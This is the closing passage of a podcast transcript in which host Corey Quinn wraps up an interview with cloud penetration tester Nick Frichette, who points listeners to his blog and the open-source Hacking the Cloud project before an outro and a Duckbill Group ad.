So I'll be keeping my eyes open to see what happens with this. And hopefully this will be
old news by the time this episode drops. If not, well, this might be an interesting episode
once it goes out.
Yeah, I hope they'll have it fixed by then.
They haven't responded to it yet,
other than the "hi, we've received your email,
thanks for checking in," but we'll see how that goes.
Watching news as it breaks is always exciting.
If people want to learn more about what you're up to
and how you
go about things, where can they find you? Yeah, so you can find me in a couple different places.
On Twitter, I'm Frichette underscore N. I also write a blog where I contribute a lot of my
research at frichetten.com, as well as Hacking the Cloud. I contribute a lot of the AWS stuff
that gets thrown on there. And it's also open source. So if anyone else would like to contribute
or share their knowledge,
you're absolutely welcome to do so.
Pull requests are open
and excited for anyone to contribute.
Excellent.
And we will, of course,
include links to that in the show notes.
Thank you so much for taking the time to speak with me.
I really appreciate it.
Yeah, thank you so much for inviting me on.
I had a great time.
Nick Frichette, Penetration Tester
and Team Lead for State Farm.
I'm cloud economist Corey Quinn, and this is Screaming in the Cloud.
If you've enjoyed this podcast, please leave a five-star review on your podcast platform of choice.
Whereas if you've hated this podcast, please leave a five-star review on your podcast platform of choice,
along with a comment telling me why none of these things are actually vulnerabilities,
but simultaneously should not be discussed in public ever.
If your AWS bill keeps rising and your blood pressure is doing the same,
then you need the Duckbill Group.
We help companies fix their AWS bill by making it smaller and less horrifying.
The Duckbill Group works for you, not AWS.
We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get
started. This has been a HumblePod production. Stay humble.